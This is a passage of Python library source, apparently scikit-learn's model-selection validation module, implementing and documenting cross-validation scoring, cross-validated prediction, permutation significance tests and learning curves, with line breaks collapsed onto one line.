cross_val_score : Run cross-validation for single metric evaluation. cross_val_predict : Get predictions from each split of cross-validation for diagnostic purposes. sklearn.metrics.make_scorer : Make a scorer from a performance metric or loss function. """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) if callable(scoring): scorers = scoring elif scoring is None or isinstance(scoring, str): scorers = check_scoring(estimator, scoring) else: scorers = _check_multimetric_scoring(estimator, scoring) # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. parallel = Parallel(n_jobs=n_jobs, verbose=verbose, pre_dispatch=pre_dispatch) results = parallel( delayed(_fit_and_score)( clone(estimator), X, y, scorers, train, test, verbose, None, fit_params, return_train_score=return_train_score, return_times=True, return_estimator=return_estimator, error_score=error_score) for train, test in cv.split(X, y, groups)) # For callabe scoring, the return type is only know after calling. If the # return type is a dictionary, the error scores can now be inserted with # the correct key. if callable(scoring): _insert_error_scores(results, error_score) results = _aggregate_score_dicts(results) ret = {} ret['fit_time'] = results["fit_time"] ret['score_time'] = results["score_time"] if return_estimator: ret['estimator'] = results["estimator"] test_scores_dict = _normalize_score_results(results["test_scores"]) if return_train_score: train_scores_dict = _normalize_score_results(results["train_scores"]) for name in test_scores_dict: ret['test_%s' % name] = test_scores_dict[name] if return_train_score: key = 'train_%s' % name ret[key] = train_scores_dict[name] return ret def _insert_error_scores(results, error_score): """Insert error in `results` by replacing them inplace with `error_score`. This only applies to multimetric scores because `_fit_and_score` will handle the single metric case. """ successful_score = None failed_indices = [] for i, result in enumerate(results): if result["fit_failed"]: failed_indices.append(i) elif successful_score is None: successful_score = result["test_scores"] if successful_score is None: raise NotFittedError("All estimators failed to fit") if isinstance(successful_score, dict): formatted_error = {} for name, score in successful_score.items(): if isinstance(score, np.ndarray) and error_score != 'raise': formatted_error[name] = np.full_like(score, error_score) else: formatted_error[name] = error_score for i in failed_indices: results[i]["test_scores"] = formatted_error.copy() if "train_scores" in results[i]: results[i]["train_scores"] = formatted_error.copy() def _normalize_score_results(scores, scaler_score_key='score'): """Creates a scoring dictionary based on the type of `scores`""" if isinstance(scores[0], dict): # multimetric scoring return _aggregate_score_dicts(scores) # scaler return {scaler_score_key: scores} @_deprecate_positional_args def cross_val_score(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', error_score=np.nan): """Evaluate a score by cross-validation Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)`` which should return only a single value. Similar to :func:`cross_validate` but only a single metric is permitted. If None, the estimator's default scorer (if available) is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : ndarray of float of shape=(len(list(cv)),) Array of scores of the estimator for each run of the cross validation. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_score >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> print(cross_val_score(lasso, X, y, cv=3)) [0.33150734 0.08022311 0.03531764] See Also --------- cross_validate : To run cross-validation on multiple metrics and also to return train scores, fit times and score times. cross_val_predict : Get predictions from each split of cross-validation for diagnostic purposes. sklearn.metrics.make_scorer : Make a scorer from a performance metric or loss function. """ # To ensure multimetric format is not supported scorer = check_scoring(estimator, scoring=scoring) cv_results = cross_validate(estimator=estimator, X=X, y=y, groups=groups, scoring={'score': scorer}, cv=cv, n_jobs=n_jobs, verbose=verbose, fit_params=fit_params, pre_dispatch=pre_dispatch, error_score=error_score) return cv_results['test_score'] def _fit_and_score(estimator, X, y, scorer, train, test, verbose, parameters, fit_params, return_train_score=False, return_parameters=False, return_n_test_samples=False, return_times=False, return_estimator=False, split_progress=None, candidate_progress=None, error_score=np.nan): """Fit estimator and compute scores for a given dataset split. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. scorer : A single callable or dict mapping scorer name to the callable If it is a single callable, the return value for ``train_scores`` and ``test_scores`` is a single float. For a dict, it should be one mapping the scorer name to the scorer callable object / function. The callable object / fn should have signature ``scorer(estimator, X, y)``. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. parameters : dict or None Parameters to be set on the estimator. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. return_train_score : bool, default=False Compute and return score on training set. return_parameters : bool, default=False Return parameters that has been used for the estimator. split_progress : {list, tuple} of int, default=None A list or tuple of format (<current_split_id>, <total_num_of_splits>). candidate_progress : {list, tuple} of int, default=None A list or tuple of format (<current_candidate_id>, <total_number_of_candidates>). return_n_test_samples : bool, default=False Whether to return the ``n_test_samples``. return_times : bool, default=False Whether to return the fit/score times. return_estimator : bool, default=False Whether to return the fitted estimator. Returns ------- result : dict with the following attributes train_scores : dict of scorer name -> float Score on training set (for all the scorers), returned only if `return_train_score` is `True`. test_scores : dict of scorer name -> float Score on testing set (for all the scorers). n_test_samples : int Number of test samples. fit_time : float Time spent for fitting in seconds. score_time : float Time spent for scoring in seconds. parameters : dict or None The parameters that have been evaluated. estimator : estimator object The fitted estimator. fit_failed : bool The estimator failed to fit. """ if not isinstance(error_score, numbers.Number) and error_score != 'raise': raise ValueError( "error_score must be the string 'raise' or a numeric value. " "(Hint: if using 'raise', please make sure that it has been " "spelled correctly.)" ) progress_msg = "" if verbose > 2: if split_progress is not None: progress_msg = f" {split_progress[0]+1}/{split_progress[1]}" if candidate_progress and verbose > 9: progress_msg += (f"; {candidate_progress[0]+1}/" f"{candidate_progress[1]}") if verbose > 1: if parameters is None: params_msg = '' else: sorted_keys = sorted(parameters) # Ensure deterministic o/p params_msg = (', '.join(f'{k}={parameters[k]}' for k in sorted_keys)) if verbose > 9: start_msg = f"[CV{progress_msg}] START {params_msg}" print(f"{start_msg}{(80 - len(start_msg)) * "."}") # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} fit_params = _check_fit_params(X, fit_params, train) if parameters is not None: # clone after setting parameters in case any parameters # are estimators (like pipeline steps) # because pipeline doesn't clone steps in fit cloned_parameters = {} for k, v in parameters.items(): cloned_parameters[k] = clone(v, safe=False) estimator = estimator.set_params(**cloned_parameters) start_time = time.time() X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) result = {} try: if y_train is None: estimator.fit(X_train, **fit_params) else: estimator.fit(X_train, y_train, **fit_params) except Exception as e: # Note fit time as time until error fit_time = time.time() - start_time score_time = 0.0 if error_score == 'raise': raise elif isinstance(error_score, numbers.Number): if isinstance(scorer, dict): test_scores = {name: error_score for name in scorer} if return_train_score: train_scores = test_scores.copy() else: test_scores = error_score if return_train_score: train_scores = error_score warnings.warn("Estimator fit failed. The score on this train-test" " partition for these parameters will be set to %f. " "Details: \n%s" % (error_score, format_exc()), FitFailedWarning) result["fit_failed"] = True else: fit_time = time.time() - start_time with warnings.catch_warnings(record=True) as score_warnings: test_scores = _score(estimator, X_test, y_test, scorer, error_score) score_time = time.time() - start_time - fit_time if return_train_score: train_scores = _score( estimator, X_train, y_train, scorer, error_score ) if score_warnings: result["fit_failed"] = True for w in score_warnings: warnings.showwarning(w.message, w.category, w.filename, w.lineno, w.file, w.line) else: result["fit_failed"] = False if verbose > 1: total_time = score_time + fit_time end_msg = f"[CV{progress_msg}] END " result_msg = params_msg + (";" if params_msg else "") if verbose > 2: if isinstance(test_scores, dict): for scorer_name in sorted(test_scores): result_msg += f" {scorer_name}=" if isinstance(test_scores[scorer_name], np.ndarray): fmt_str = '' else: fmt_str = '.3f' if return_train_score: scorer_scores = train_scores[scorer_name] result_msg += f"(train={scorer_scores:{fmt_str}}, test={test_scores[scorer_name]:{fmt_str}})," else: result_msg += f"{test_scores[scorer_name]:{fmt_str}}," else: result_msg += " score=" result_msg += (f"{test_scores:.3f}," if not return_train_score else f"(train={train_scores:.3f}, test={test_scores:.3f}),") result_msg += f" total time={logger.short_format_time(total_time)}" # Right align the result_msg end_msg += "." * (80 - len(end_msg) - len(result_msg)) end_msg += result_msg print(end_msg) result["test_scores"] = test_scores if return_train_score: result["train_scores"] = train_scores if return_n_test_samples: result["n_test_samples"] = _num_samples(X_test) if return_times: result["fit_time"] = fit_time result["score_time"] = score_time if return_parameters: result["parameters"] = parameters if return_estimator: result["estimator"] = estimator return result def _score(estimator, X_test, y_test, scorer, error_score="raise"): """Compute the score(s) of an estimator on a given test set. Will return a dict of floats if `scorer` is a dict, otherwise a single float is returned. """ if isinstance(scorer, dict): # will cache method calls if needed. scorer() returns a dict scorer = _MultimetricScorer(**scorer) try: if y_test is None: scores = scorer(estimator, X_test) else: scores = scorer(estimator, X_test, y_test) except Exception: if error_score == 'raise': raise else: if isinstance(scorer, _MultimetricScorer): scores = {name: error_score for name in scorer._scorers} else: scores = error_score warnings.warn( f"Scoring failed. The score on this train-test partition for " f"these parameters will be set to {error_score}. Details: \n" f"{format_exc()}", UserWarning, ) error_msg = ( "scoring must return a number, got %s (%s) instead. (scorer=%s)" ) if isinstance(scores, dict): for name, score in scores.items(): if hasattr(score, 'item'): with suppress(ValueError): # e.g. unwrap memmapped scalars score = score.item() elif isinstance(score, tuple): score = np.stack(score) if not isinstance(score, (numbers.Number, np.ndarray)): raise ValueError(error_msg % (score, type(score), name)) scores[name] = score else: # scalar if hasattr(scores, 'item'): with suppress(ValueError): # e.g. unwrap memmapped scalars scores = scores.item() if not isinstance(scores, numbers.Number): raise ValueError(error_msg % (scores, type(scores), scorer)) return scores @_deprecate_positional_args def cross_val_predict(estimator, X, y=None, *, groups=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', method='predict'): """Generate cross-validated estimates for each input data point The data is split according to the cv parameter. Each sample belongs to exactly one test set, and its prediction is computed with an estimator fitted on the corresponding training set. Passing these predictions into an evaluation metric may not be a valid way to measure generalization performance. Results can differ from :func:`cross_validate` and :func:`cross_val_score` unless all tests sets have equal size and the metric decomposes over samples. Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' and 'predict' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be, for example a list, or an array at least 2d. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and predicting are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, defualt=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' method : {'predict', 'predict_proba', 'predict_log_proba', \ 'decision_function'}, default='predict' The method to be invoked by `estimator`. Returns ------- predictions : ndarray This is the result of calling `method`. Shape: - When `method` is 'predict' and in special case where `method` is 'decision_function' and the target is binary: (n_samples,) - When `method` is one of {'predict_proba', 'predict_log_proba', 'decision_function'} (unless special case above): (n_samples, n_classes) - If `estimator` is :term:`multioutput`, an extra dimension 'n_outputs' is added to the end of each shape above. See Also -------- cross_val_score : Calculate score for each CV split. cross_validate : Calculate one or more scores and timings for each CV split. Notes ----- In the case that one or more classes are absent in a training portion, a default score needs to be assigned to all instances for that class if ``method`` produces columns per class, as in {'decision_function', 'predict_proba', 'predict_log_proba'}. For ``predict_proba`` this value is 0. In order to ensure finite output, we approximate negative infinity by the minimum finite float value for the dtype in other cases. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_predict >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> y_pred = cross_val_predict(lasso, X, y, cv=3) """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) splits = list(cv.split(X, y, groups)) test_indices = np.concatenate([test for _, test in splits]) if not _check_is_permutation(test_indices, _num_samples(X)): raise ValueError('cross_val_predict only works for partitions') # If classification methods produce multiple columns of output, # we need to manually encode classes to ensure consistent column ordering. encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: y = np.asarray(y) if y.ndim == 1: le = LabelEncoder() y = le.fit_transform(y) elif y.ndim == 2: y_enc = np.zeros_like(y, dtype=int) for i_label in range(y.shape[1]): y_enc[:, i_label] = LabelEncoder().fit_transform(y[:, i_label]) y = y_enc # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. parallel = Parallel(n_jobs=n_jobs, verbose=verbose, pre_dispatch=pre_dispatch) predictions = parallel(delayed(_fit_and_predict)( clone(estimator), X, y, train, test, verbose, fit_params, method) for train, test in splits) inv_test_indices = np.empty(len(test_indices), dtype=int) inv_test_indices[test_indices] = np.arange(len(test_indices)) if sp.issparse(predictions[0]): predictions = sp.vstack(predictions, format=predictions[0].format) elif encode and isinstance(predictions[0], list): # `predictions` is a list of method outputs from each fold. # If each of those is also a list, then treat this as a # multioutput-multiclass task. We need to separately concatenate # the method outputs for each label into an `n_labels` long list. n_labels = y.shape[1] concat_pred = [] for i_label in range(n_labels): label_preds = np.concatenate([p[i_label] for p in predictions]) concat_pred.append(label_preds) predictions = concat_pred else: predictions = np.concatenate(predictions) if isinstance(predictions, list): return [p[inv_test_indices] for p in predictions] else: return predictions[inv_test_indices] def _fit_and_predict(estimator, X, y, train, test, verbose, fit_params, method): """Fit estimator and predict values for a given dataset split. Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' and 'predict' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. .. versionchanged:: 0.20 X is only required to be an object with finite length or shape now y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. method : str Invokes the passed method name of the passed estimator. Returns ------- predictions : sequence Result of calling 'estimator.method' """ # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} fit_params = _check_fit_params(X, fit_params, train) X_train, y_train = _safe_split(estimator, X, y, train) X_test, _ = _safe_split(estimator, X, y, test, train) if y_train is None: estimator.fit(X_train, **fit_params) else: estimator.fit(X_train, y_train, **fit_params) func = getattr(estimator, method) predictions = func(X_test) encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: if isinstance(predictions, list): predictions = [_enforce_prediction_order( estimator.classes_[i_label], predictions[i_label], n_classes=len(set(y[:, i_label])), method=method) for i_label in range(len(predictions))] else: # A 2D y array should be a binary label indicator matrix n_classes = len(set(y)) if y.ndim == 1 else y.shape[1] predictions = _enforce_prediction_order( estimator.classes_, predictions, n_classes, method) return predictions def _enforce_prediction_order(classes, predictions, n_classes, method): """Ensure that prediction arrays have correct column order When doing cross-validation, if one or more classes are not present in the subset of data used for training, then the output prediction array might not have the same columns as other folds. Use the list of class names (assumed to be ints) to enforce the correct column order. Note that `classes` is the list of classes in this fold (a subset of the classes in the full training set) and `n_classes` is the number of classes in the full training set. """ if n_classes != len(classes): recommendation = ( 'To fix this, use a cross-validation ' 'technique resulting in properly ' 'stratified folds') warnings.warn('Number of classes in training fold ({}) does ' 'not match total number of classes ({}). ' 'Results may not be appropriate for your use case. ' '{}'.format(len(classes), n_classes, recommendation), RuntimeWarning) if method == 'decision_function': if (predictions.ndim == 2 and predictions.shape[1] != len(classes)): # This handles the case when the shape of predictions # does not match the number of classes used to train # it with. This case is found when sklearn.svm.SVC is # set to `decision_function_shape='ovo'`. raise ValueError('Output shape {} of {} does not match ' 'number of classes ({}) in fold. ' 'Irregular decision_function outputs ' 'are not currently supported by ' 'cross_val_predict'.format( predictions.shape, method, len(classes))) if len(classes) <= 2: # In this special case, `predictions` contains a 1D array. raise ValueError('Only {} class/es in training fold, but {} ' 'in overall dataset. This ' 'is not supported for decision_function ' 'with imbalanced folds. {}'.format( len(classes), n_classes, recommendation)) float_min = np.finfo(predictions.dtype).min default_values = {'decision_function': float_min, 'predict_log_proba': float_min, 'predict_proba': 0} predictions_for_all_classes = np.full((_num_samples(predictions), n_classes), default_values[method], dtype=predictions.dtype) predictions_for_all_classes[:, classes] = predictions predictions = predictions_for_all_classes return predictions def _check_is_permutation(indices, n_samples): """Check whether indices is a reordering of the array np.arange(n_samples) Parameters ---------- indices : ndarray int array to test n_samples : int number of expected elements Returns ------- is_partition : bool True iff sorted(indices) is np.arange(n) """ if len(indices) != n_samples: return False hit = np.zeros(n_samples, dtype=bool) hit[indices] = True if not np.all(hit): return False return True @_deprecate_positional_args def permutation_test_score(estimator, X, y, *, groups=None, cv=None, n_permutations=100, n_jobs=None, random_state=0, verbose=0, scoring=None, fit_params=None): """Evaluate the significance of a cross-validated score with permutations Permutes targets to generate 'randomized data' and compute the empirical p-value against the null hypothesis that features and targets are independent. The p-value represents the fraction of randomized data sets where the estimator performed as well or better than in the original data. A small p-value suggests that there is a real dependency between features and targets which has been used by the estimator to give good predictions. A large p-value may be due to lack of real dependency between features and targets or the estimator was not able to use the dependency to give good predictions. Read more in the :ref:`User Guide <permutation_test_score>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape at least 2D The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Labels to constrain permutation within groups, i.e. ``y`` values are permuted among samples with the same group identifier. When not specified, ``y`` values are permuted among all samples. When a grouped cross-validator is used, the group labels are also passed on to the ``split`` method of the cross-validator. The cross-validator uses them for grouping the samples while splitting the dataset into train/test set. scoring : str or callable, default=None A single str (see :ref:`scoring_parameter`) or a callable (see :ref:`scoring`) to evaluate the predictions on the test set. If None the estimator's score method is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_permutations : int, default=100 Number of times to permute ``y``. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the cross-validated score are parallelized over the permutations. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. random_state : int, RandomState instance or None, default=0 Pass an int for reproducible output for permutation of ``y`` values among samples. See :term:`Glossary <random_state>`. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 Returns ------- score : float The true score without permuting targets. permutation_scores : array of shape (n_permutations,) The scores obtained for each permutations. pvalue : float The p-value, which approximates the probability that the score would be obtained by chance. This is calculated as: `(C + 1) / (n_permutations + 1)` Where C is the number of permutations whose score >= the true score. The best possible p-value is 1/(n_permutations + 1), the worst is 1.0. Notes ----- This function implements Test 1 in: Ojala and Garriga. `Permutation Tests for Studying Classifier Performance <http://www.jmlr.org/papers/volume11/ojala10a/ojala10a.pdf>`_. The Journal of Machine Learning Research (2010) vol. 11 """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) scorer = check_scoring(estimator, scoring=scoring) random_state = check_random_state(random_state) # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. score = _permutation_test_score(clone(estimator), X, y, groups, cv, scorer, fit_params=fit_params) permutation_scores = Parallel(n_jobs=n_jobs, verbose=verbose)( delayed(_permutation_test_score)( clone(estimator), X, _shuffle(y, groups, random_state), groups, cv, scorer, fit_params=fit_params) for _ in range(n_permutations)) permutation_scores = np.array(permutation_scores) pvalue = (np.sum(permutation_scores >= score) + 1.0) / (n_permutations + 1) return score, permutation_scores, pvalue def _permutation_test_score(estimator, X, y, groups, cv, scorer, fit_params): """Auxiliary function for permutation_test_score""" # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} avg_score = [] for train, test in cv.split(X, y, groups): X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) fit_params = _check_fit_params(X, fit_params, train) estimator.fit(X_train, y_train, **fit_params) avg_score.append(scorer(estimator, X_test, y_test)) return np.mean(avg_score) def _shuffle(y, groups, random_state): """Return a shuffled copy of y eventually shuffle among same groups.""" if groups is None: indices = random_state.permutation(len(y)) else: indices = np.arange(len(groups)) for group in np.unique(groups): this_mask = (groups == group) indices[this_mask] = random_state.permutation(indices[this_mask]) return _safe_indexing(y, indices) @_deprecate_positional_args def learning_curve(estimator, X, y, *, groups=None, train_sizes=np.linspace(0.1, 1.0, 5), cv=None, scoring=None, exploit_incremental_learning=False, n_jobs=None, pre_dispatch="all", verbose=0, shuffle=False, random_state=None, error_score=np.nan, return_times=False, fit_params=None): """Learning curve. Determines cross-validated training and test scores for different training set sizes. A cross-validation generator splits the whole dataset k times in training and test data. Subsets of the training set with varying sizes will be used to train the estimator and a score for each training subset size and the test set will be computed. Afterwards, the scores will be averaged over all k runs for each training subset size. Read more in the :ref:`User Guide <learning_curve>`. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. X : array-like of shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like of shape (n_samples,) or (n_samples, n_outputs) Target relative to X for classification or regression; None for unsupervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). train_sizes : array-like of shape (n_ticks,), \ default=np.linspace(0.1, 1.0, 5) Relative or absolute numbers of training examples that will be used to generate the learning curve. If the dtype is float, it is regarded as a fraction of the maximum size of the training set (that is determined by the selected validation method), i.e. it has to be within (0, 1]. Otherwise it is interpreted as absolute sizes of the training sets. Note that for classification the number of samples usually have to be big enough to contain at least one sample from each class. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)``. exploit_incremental_learning : bool, default=False If the estimator supports incremental learning, this will be used to speed up fitting for different training set sizes. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the different training and test sets. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. pre_dispatch : int or str, default='all' Number of predispatched jobs for parallel execution (default is all). The option can reduce the allocated memory. The str can be an expression like '2*n_jobs'. verbose : int, default=0 Controls the verbosity: the higher, the more messages. shuffle : bool, default=False Whether to shuffle training data before taking prefixes of it based on``train_sizes``. random_state : int, RandomState instance or None, default=None Used when ``shuffle`` is True. Pass an int for reproducible output across multiple function calls. See :term:`Glossary <random_state>`. error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 return_times : bool, default=False Whether to return the fit and score times. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 Returns ------- train_sizes_abs : array of shape (n_unique_ticks,) Numbers of training examples that has been used to generate the learning curve. Note that the number of ticks might be less than n_ticks because duplicate entries will be removed. train_scores : array of shape (n_ticks, n_cv_folds) Scores on training sets. test_scores : array of shape (n_ticks, n_cv_folds) Scores on test set. fit_times : array of shape (n_ticks, n_cv_folds) Times spent for fitting in seconds. Only present if ``return_times`` is True. score_times : array of shape (n_ticks, n_cv_folds) Times spent for scoring in seconds. Only present if ``return_times`` is True. Notes ----- See :ref:`examples/model_selection/plot_learning_curve.py <sphx_glr_auto_examples_model_selection_plot_learning_curve.py>` """ if exploit_incremental_learning and not hasattr(estimator, "partial_fit"): raise ValueError("An estimator must support the partial_fit interface " "to exploit incremental learning") X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) # Store it as list as we will be iterating over the list multiple times cv_iter = list(cv.split(X, y, groups)) scorer = check_scoring(estimator, scoring=scoring) n_max_training_samples = len(cv_iter[0][0]) # Because the lengths of folds can be significantly different, it is # not guaranteed that we use all of the available training data when we # use the first 'n_max_training_samples' samples. train_sizes_abs = _translate_train_sizes(train_sizes, n_max_training_samples) n_unique_ticks = train_sizes_abs.shape[0] if verbose > 0: print("[learning_curve] Training set sizes: " + str(train_sizes_abs)) parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch, verbose=verbose) if shuffle: rng = check_random_state(random_state) cv_iter = ((rng.permutation(train), test) for train, test in cv_iter) if exploit_incremental_learning: classes = np.unique(y) if is_classifier(estimator) else None out = parallel(delayed(_incremental_fit_estimator)( clone(estimator), X, y, classes, train, test, train_sizes_abs, scorer, verbose, return_times, error_score=error_score, fit_params=fit_params) for train, test in cv_iter ) out = np.asarray(out).transpose((2, 1, 0)) else: train_test_proportions = [] for train, test in cv_iter: for n_train_samples in train_sizes_abs: train_test_proportions.append((train[:n_train_samples], test)) results = parallel(delayed(_fit_and_score)( clone(estimator), X, y, scorer, train, test, verbose, parameters=None, fit_params=fit_params, return_train_score=True, error_score=error_score, return_times=return_times) for train, test in train_test_proportions ) results = _aggregate_score_dicts(results) train_scores = results["train_scores"].reshape(-1, n_unique_ticks).T test_scores = results["test_scores"].reshape(-1, n_unique_ticks).T out = [train_scores, test_scores] if return_times: fit_times = results["fit_time"].reshape(-1, n_unique_ticks).T score_times = results["score_time"].reshape(-1, n_unique_ticks).T out.extend([fit_times, score_times]) ret = train_sizes_abs, out[0], out[1] if return_times: ret = ret + (out[2], out[3]) return ret def _translate_train_sizes(train_sizes, n_max_training_samples): """Determine absolute sizes of training subsets and validate 'train_sizes'. Examples: _translate_train_sizes([0.5, 1.0], 10) -> [5, 10] _translate_train_sizes([5, 10], 10) -> [5, 10] Parameters ---------- train_sizes : 